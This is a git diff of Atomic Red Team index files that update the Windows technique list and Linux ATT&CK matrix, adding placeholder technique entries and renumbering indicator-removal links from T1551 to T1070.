@@ -198,6 +201,7 @@
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
@@ -208,7 +212,7 @@
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551 Indicator Removal on Host](../../T1551/T1551.md)
+- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
@@ -252,7 +256,7 @@
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
-- [T1551.005 Network Share Connection Removal](../../T1551.005/T1551.005.md)
+- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
@@ -275,6 +279,7 @@
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -307,6 +312,7 @@
- Atomic Test #1: DCShadow - Mimikatz [windows]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -338,12 +344,13 @@
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.006 Timestomp](../../T1551.006/T1551.006.md)
+- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- T1134.001 Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -387,6 +394,7 @@
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -435,6 +443,7 @@
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
@@ -468,6 +477,7 @@
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -599,6 +609,7 @@
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
+- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
@@ -620,11 +631,15 @@
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.004 DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
@@ -666,6 +681,7 @@
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -676,6 +692,7 @@
- T1132.001 Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
@@ -743,6 +760,7 @@
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1204.002 Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
@@ -781,7 +799,7 @@
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1059.005 VBScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 583cac14..ccbf3a7d 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -2,55 +2,67 @@
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash](../../T1059.004/T1059.004.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1551.003/T1551.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1551.004/T1551.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Trap](../../T1546.005/T1546.005.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | [Local Account](../../T1136.001/T1136.001.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
